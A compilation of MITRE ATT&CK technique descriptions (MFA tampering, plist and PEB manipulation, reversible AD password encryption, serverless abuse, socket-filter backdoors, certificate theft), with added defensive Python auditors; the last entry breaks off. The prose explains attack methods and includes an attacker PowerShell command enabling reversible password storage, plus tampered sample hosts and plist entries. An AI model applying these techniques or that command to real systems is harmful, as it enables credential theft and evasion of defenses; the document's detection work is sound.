| Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions) For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) |
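The hosts-file variant above is cheap to audit because the tampering is a plain text file on the host. The following Python is an added example (not part of the ATT&CK description): it parses hosts-file content, and for every hostname on a watchlist of MFA endpoints reports whether it has been sinkholed (loopback or 0.0.0.0, the fail-open scenario) or redirected elsewhere. The file content and the `*.mfa-provider.example` hostnames are constructed placeholders, not real vendor endpoints; the watchlist would be populated from the actual MFA integration's configuration.

```python
import ipaddress
from typing import List, Set, Tuple

# Constructed hosts file content (the stock header plus tampered entries); hostnames are placeholders
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
# entries added later
127.0.0.1   api.mfa-provider.example
10.20.30.40 intranet.corp.example
0.0.0.0     auth.mfa-provider.example   # trailing comment
"""

# Hostnames the MFA integration must reach; the hosts file should never override these at all
WATCHED_MFA_HOSTS: Set[str] = {"api.mfa-provider.example", "auth.mfa-provider.example"}


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """Return (address, [hostnames]) pairs, ignoring comments and blank lines."""
    entries: List[Tuple[str, List[str]]] = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1:]))
    return entries


def is_sinkhole(address: str) -> bool:
    """Loopback or unspecified mappings make the MFA call fail outright, which fail-open then waves through."""
    try:
        ip = ipaddress.ip_address(address)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified


def audit_hosts(text: str, watched: Set[str]) -> List[str]:
    findings: List[str] = []
    for address, names in parse_hosts(text):
        for name in names:
            if name.lower() in watched:
                kind = "sinkholed" if is_sinkhole(address) else "redirected"
                findings.append(f"{name} {kind} to {address}")
    return findings


def demo() -> List[str]:
    return audit_hosts(SAMPLE_HOSTS, WATCHED_MFA_HOSTS)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

The complementary control is on the MFA side: configure the integration to fail closed, so that an unreachable MFA service denies the logon instead of granting it, and the hosts-file trick yields a lockout that someone will notice rather than a silent bypass.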
| Description |
|---|
| Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe) |
| Description |
|---|
Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs that set environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)
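Both of the plist modifications above can be checked with the standard library, since `plistlib` reads the XML and binary formats the description mentions. The following Python is an added example, not part of the ATT&CK text: it flags `LSUIElement` and any `LSEnvironment` entry in an application's Info.plist (rating the `DYLD_*` injection variables high), and reports Dock entries whose bundle lives outside the usual application folders. Both plists are constructed samples; the bundle identifier, the `/Users/Shared/.cache` paths and the Dock plist layout used here (`persistent-apps` / `tile-data` / `file-data` / `_CFURLString`) are assumptions of this example.

```python
import plistlib
from typing import List, Tuple

# Environment variables that alter dynamic linking; their presence in LSEnvironment is a strong signal
SUSPICIOUS_ENV_KEYS = {"DYLD_INSERT_LIBRARIES", "DYLD_LIBRARY_PATH", "DYLD_FRAMEWORK_PATH"}

# Constructed Info.plist of a hypothetical bundle com.example.updater
INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.example.updater</string>
  <key>CFBundleExecutable</key><string>Updater</string>
  <key>LSUIElement</key><true/>
  <key>LSEnvironment</key>
  <dict>
    <key>DYLD_INSERT_LIBRARIES</key><string>/Users/Shared/.cache/libhelper.dylib</string>
  </dict>
</dict>
</plist>"""

# Constructed com.apple.dock.plist excerpt: one normal tile and one pointing outside /Applications
DOCK_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>persistent-apps</key>
  <array>
    <dict><key>tile-data</key><dict><key>file-data</key>
      <dict><key>_CFURLString</key><string>file:///Applications/Safari.app/</string></dict></dict></dict>
    <dict><key>tile-data</key><dict><key>file-data</key>
      <dict><key>_CFURLString</key><string>file:///Users/Shared/.cache/Updater.app/</string></dict></dict></dict>
  </array>
</dict>
</plist>"""


def audit_info_plist(data: bytes) -> List[str]:
    """Flag keys that hide the app or inject environment into its process."""
    plist = plistlib.loads(data)          # handles XML and binary plists alike
    findings: List[str] = []
    ui_element = plist.get("LSUIElement")
    if ui_element is True or str(ui_element) == "1":   # boolean <true/> or the string "1" form
        findings.append("LSUIElement set: app runs without Dock icon or menu bar")
    for key, value in (plist.get("LSEnvironment") or {}).items():
        level = "high" if key in SUSPICIOUS_ENV_KEYS else "info"
        findings.append(f"LSEnvironment {key}={value} ({level})")
    return findings


def audit_dock_plist(data: bytes,
                     allowed_prefixes: Tuple[str, ...] = ("file:///Applications/", "file:///System/")) -> List[str]:
    """Report persistent Dock tiles whose bundle URL is outside the trusted application folders."""
    plist = plistlib.loads(data)
    findings: List[str] = []
    for tile in plist.get("persistent-apps", []):
        url = tile.get("tile-data", {}).get("file-data", {}).get("_CFURLString", "")
        if not url.startswith(allowed_prefixes):
            findings.append(f"Dock entry outside trusted locations: {url}")
    return findings


def demo() -> Tuple[List[str], List[str]]:
    return audit_info_plist(INFO_PLIST), audit_dock_plist(DOCK_PLIST)


if __name__ == "__main__":
    for group in demo():
        for line in group:
            print(line)
```

`LSUIElement` is legitimate for menu-bar utilities, so the first finding is context rather than a verdict; `DYLD_INSERT_LIBRARIES` in a shipped Info.plist almost never is, and comparing the plist against the bundle's code signature (an edited Info.plist breaks the seal) turns the hint into a concrete check.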
| Description |
|---|
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.
| Description |
|---|
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software requires it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters
2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters
3. Global LSA secret (G$MSRADIUSCHAPKEY)
4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply an FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true. |
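Because the property can be flipped per account, the defender's recurring check is an audit of which accounts currently have it set. On the account object this setting is the ENCRYPTED_TEXT_PWD_ALLOWED bit (0x80) of userAccountControl. The following is an added example (not from the ATT&CK entry or its citations) that decodes that attribute over a constructed export; the record shape and the account names are assumptions of this example.

```python
"""Audit userAccountControl values for the reversible-encryption bit.

Added example, not from the ATT&CK page. SAMPLE_USERS is a constructed stand-in
for an LDAP export of sAMAccountName and userAccountControl.
"""

# Documented userAccountControl bits (subset relevant to this audit)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",   # "Store password using reversible encryption"
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
ENCRYPTED_TEXT_PWD_ALLOWED = 0x0080


def decode_uac(value: int) -> list[str]:
    """Names of the known bits set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def accounts_with_reversible_encryption(records) -> list[str]:
    """sAMAccountNames whose userAccountControl has ENCRYPTED_TEXT_PWD_ALLOWED set.
    Disabled accounts are included on purpose: once re-enabled, a password stored
    while the bit was set is still recoverable."""
    return sorted(
        r["sAMAccountName"]
        for r in records
        if r["userAccountControl"] & ENCRYPTED_TEXT_PWD_ALLOWED
    )


# Constructed sample export (not real accounts)
SAMPLE_USERS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x200 | 0x80 | 0x10000},
    {"sAMAccountName": "bob", "userAccountControl": 0x202},
    {"sAMAccountName": "contractor7", "userAccountControl": 0x200 | 0x80},
]

if __name__ == "__main__":
    for name in accounts_with_reversible_encryption(SAMPLE_USERS):
        uac = next(r["userAccountControl"] for r in SAMPLE_USERS if r["sAMAccountName"] == name)
        print(name, hex(uac), decode_uac(uac))
```

The per-account bit is only one of the scopes the description lists: an FGPP or the default domain policy can enable reversible encryption for everyone it applies to without touching userAccountControl, so the live audit should also read the ReversibleEncryptionEnabled property returned by Get-ADFineGrainedPasswordPolicy and Get-ADDefaultDomainPasswordPolicy.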
| Description |
|---|
| Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO) To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonally popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO) Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader) SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader) |
| Description |
|---|
| Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers) |
| Description |
|---|
| Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers) |
| Description |
|---|
| Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation) Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) |
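The `IAM:PassRole` abuse in the description above depends on a policy that lets a principal pass any role to any service. The following is an added example (not from the ATT&CK entry or the cited Rhino Security Labs research) of a policy linter that flags such statements; SAMPLE_POLICY is constructed, with the weak statement beside its corrected form, and the account id 123456789012 is a placeholder.

```python
"""Flag IAM policy statements that allow iam:PassRole without tight scoping.

Added example, not from the page. SAMPLE_POLICY is a constructed policy document;
the account id is a placeholder.
"""
import fnmatch


def _as_list(value):
    """IAM allows a string or a list in Action, Resource and Statement."""
    return value if isinstance(value, list) else [value]


def _allows(pattern: str, action: str) -> bool:
    """IAM action matching is case-insensitive and supports '*' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def risky_passrole_statements(policy: dict) -> list[dict]:
    """Return Allow statements that grant iam:PassRole on every role (Resource '*'
    or '...:role/*') and carry no iam:PassedToService condition limiting which
    service may receive the role."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        if not any(_allows(a, "iam:PassRole") for a in _as_list(stmt.get("Action", []))):
            continue
        resources = _as_list(stmt.get("Resource", []))
        broad = any(r == "*" or r.endswith(":role/*") for r in resources)
        conditions = stmt.get("Condition", {})
        limited = any("iam:PassedToService" in keys for keys in conditions.values())
        if broad and not limited:
            findings.append({"index": idx, "sid": stmt.get("Sid"), "resources": resources})
    return findings


# Constructed policy: the first statement is the weak setting, the second the corrected one.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "DeployFunctionsBroad",
            "Effect": "Allow",
            "Action": ["lambda:CreateFunction", "lambda:UpdateFunctionConfiguration", "iam:PassRole"],
            "Resource": "*",
        },
        {
            "Sid": "DeployFunctionsScoped",
            "Effect": "Allow",
            "Action": "iam:PassRole",
            "Resource": "arn:aws:iam::123456789012:role/lambda-exec-role",
            "Condition": {"StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}},
        },
    ],
}

if __name__ == "__main__":
    for f in risky_passrole_statements(SAMPLE_POLICY):
        print(f"statement {f['index']} ({f['sid']}) can pass any role: {f['resources']}")
```

The scoped statement shows the two controls that matter: a Resource naming the one execution role the function is allowed to assume, and an `iam:PassedToService` condition so the role can only be handed to the intended service. The linter also catches wildcard actions such as `iam:*` or `*`, which grant PassRole implicitly.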
| Description |
|---|
| Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020) Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage. |
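The description closes on the visibility problem: a socket with an attached filter produces no traffic and little CPU load. What a host can still show is the socket itself. On Linux, AF_PACKET sockets are listed in `/proc/net/packet`, and each one can be attributed to a process through `/proc/<pid>/fd`. The following is an added example (not from the ATT&CK entry or the cited reports) that parses that file and lists all-protocol raw sockets for attribution; SAMPLE_PROC_NET_PACKET is a constructed copy of the file's layout, and the column handling reflects the kernel's format as this example understands it.

```python
"""Enumerate AF_PACKET sockets from /proc/net/packet and attribute them to PIDs.

Added example, not from the ATT&CK page. The BPF program attached with
SO_ATTACH_FILTER is not itself shown in /proc, but the socket carrying it is.
SAMPLE_PROC_NET_PACKET is a constructed sample in the file's format.
"""
import os
from dataclasses import dataclass

ETH_P_ALL = 0x0003   # protocol 0003: the socket receives every frame on the interface


@dataclass(frozen=True)
class PacketSocket:
    sk: str
    sock_type: int   # 3 = SOCK_RAW, 2 = SOCK_DGRAM
    proto: int       # ethertype, printed in hex by the kernel
    ifindex: int     # 0 = bound to all interfaces
    running: int
    uid: int
    inode: int


def parse_proc_net_packet(text: str) -> list[PacketSocket]:
    """Parse the contents of /proc/net/packet (header line, then one row per socket)."""
    sockets = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 9:
            continue
        sk, _refcnt, stype, proto, iface, running, _rmem, user, inode = f[:9]
        sockets.append(PacketSocket(sk, int(stype), int(proto, 16), int(iface),
                                    int(running), int(user), int(inode)))
    return sockets


def all_frames_sockets(sockets) -> list[PacketSocket]:
    """Sockets that see every frame (ETH_P_ALL); ifindex 0 means every interface."""
    return [s for s in sockets if s.proto == ETH_P_ALL]


def socket_owners(inodes) -> dict[int, list[int]]:
    """Map socket inodes to the PIDs holding them open by walking /proc/<pid>/fd.
    Needs a live Linux /proc and privilege to read other users' fd links."""
    wanted = {f"socket:[{i}]": i for i in inodes}
    owners = {i: [] for i in inodes}
    for pid in (p for p in os.listdir("/proc") if p.isdigit()):
        fd_dir = f"/proc/{pid}/fd"
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target in wanted:
                owners[wanted[target]].append(int(pid))
    return owners


# Constructed sample: the first row is a raw, all-protocol, all-interface socket owned by uid 0.
SAMPLE_PROC_NET_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a2b3c4d5e60 3      3    0003   0     1 0      0      31337
ffff9a2b3c4d5e61 3      2    0800   2     1 0      1000   41020
"""

if __name__ == "__main__":
    for s in all_frames_sockets(parse_proc_net_packet(SAMPLE_PROC_NET_PACKET)):
        print(f"inode {s.inode}: type={s.sock_type} proto=0x{s.proto:04x} ifindex={s.ifindex} uid={s.uid}")
    if os.path.exists("/proc/net/packet"):
        with open("/proc/net/packet") as fh:
            live = all_frames_sockets(parse_proc_net_packet(fh.read()))
        print("live all-frames sockets by owning PID:", socket_owners([s.inode for s in live]))
```

Packet-capture and monitoring agents open the same kind of socket, so the output is an attribution list rather than an alert: every all-frames socket should map to a process the host is expected to run. An all-frames socket whose owner is not a known capture tool, or that has no visible owner at all, is what to investigate.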
| Description |
|---|
| Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. 
These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned) |
| Description |
|---|
| Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variable names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018) Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021) |
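For ELF payloads, "stripped" has a concrete meaning that a triage script can test: the file carries no SHT_SYMTAB section. The following is an added example (not from the ATT&CK entry or the cited Mandiant and Intezer write-ups) that walks the ELF64 section header table to make that determination. It includes a builder for a minimal, non-executable ELF image so the check can be exercised offline; handling only little-endian ELF64 is an assumption of this example.

```python
"""Tell whether an ELF64 file has been stripped of its symbol table.

Added example, not from the ATT&CK page. `strip` removes the .symtab section
(and usually .strtab); file(1) reports "stripped" on the same basis. build_elf()
constructs a minimal image for demonstration; is_stripped_file() checks a real file.
Only little-endian ELF64 is handled (assumption of this example).
"""
import struct

ELF_MAGIC = b"\x7fELF"
SHT_NULL, SHT_SYMTAB, SHT_STRTAB = 0, 2, 3
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes
SHDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr, 64 bytes


def section_table(data: bytes) -> list[tuple[str, int]]:
    """Return [(section name, sh_type)] for a little-endian ELF64 image."""
    if data[:4] != ELF_MAGIC or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    hdr = EHDR.unpack_from(data, 0)
    shoff, shentsize, shnum, shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    headers = [SHDR.unpack_from(data, shoff + i * shentsize) for i in range(shnum)]
    names_off, names_size = headers[shstrndx][4], headers[shstrndx][5]   # .shstrtab offset/size
    names = data[names_off:names_off + names_size]

    def name_at(idx: int) -> str:
        return names[idx:names.index(b"\0", idx)].decode()

    return [(name_at(h[0]), h[1]) for h in headers]


def is_stripped(data: bytes) -> bool:
    """An ELF with no SHT_SYMTAB section carries no static symbol table."""
    return not any(sh_type == SHT_SYMTAB for _, sh_type in section_table(data))


def is_stripped_file(path: str) -> bool:
    with open(path, "rb") as fh:
        return is_stripped(fh.read())


def build_elf(with_symtab: bool) -> bytes:
    """Construct a minimal ELF64 relocatable image containing only the sections needed here."""
    names = b"\0.symtab\0.strtab\0.shstrtab\0"       # name string offsets: 1, 9, 17
    sections = [(0, SHT_NULL)]
    if with_symtab:
        sections.append((1, SHT_SYMTAB))
    sections.append((9, SHT_STRTAB))
    sections.append((17, SHT_STRTAB))                # .shstrtab, kept last
    shnum = len(sections)
    shoff = EHDR.size
    names_off = shoff + SHDR.size * shnum
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELFCLASS64, little-endian, EV_CURRENT
    ehdr = EHDR.pack(ident, 1, 0x3E, 1, 0, 0, shoff, 0, EHDR.size, 0, 0, SHDR.size, shnum, shnum - 1)
    shdrs = b"".join(
        SHDR.pack(nm, typ, 0, 0, names_off if nm == 17 else 0, len(names) if nm == 17 else 0, 0, 0, 1, 0)
        for nm, typ in sections
    )
    return ehdr + shdrs + names


if __name__ == "__main__":
    for label, image in (("with symbols", build_elf(True)), ("stripped", build_elf(False))):
        print(label, [n for n, _ in section_table(image)], "stripped" if is_stripped(image) else "not stripped")
```

Absence of .symtab is the "stripped" signal; a dynamically linked binary still keeps .dynsym for the loader, so a stripped file is not symbol-free, only free of the static symbols that name its internal functions.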
| Description |
|---|
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll.(Citation: Microsoft System Services Fundamentals) The termsrv.dll file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
